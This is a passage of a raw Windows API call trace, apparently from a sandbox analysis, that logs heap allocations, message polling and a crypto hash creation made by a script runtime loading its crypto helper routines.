RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0230.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.820] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0230.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0230.821] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.821] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.821] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0230.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0230.821] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0230.821] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.821] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0230.821] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0230.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0230.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0230.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0230.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0230.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0230.822] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0230.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0230.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0230.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0230.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0230.823] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0230.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0230.824] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0230.824] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0230.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0230.824] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0230.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0230.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0230.825] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.825] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.825] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0230.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0230.825] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0230.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0230.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0230.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.826] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0230.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0230.826] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0230.826] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0230.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0230.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0230.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0230.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0230.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0230.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0230.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e512e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0230.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0230.827] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0230.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0230.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0230.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0230.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0230.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0230.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0230.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0230.827] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0230.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0230.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0230.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0230.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0230.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0230.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0230.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0230.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0230.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0230.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0230.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0230.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0230.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0230.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0230.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0230.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0230.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0230.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0230.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0230.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0230.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0230.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0230.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0230.831] PeekMessageW (in: 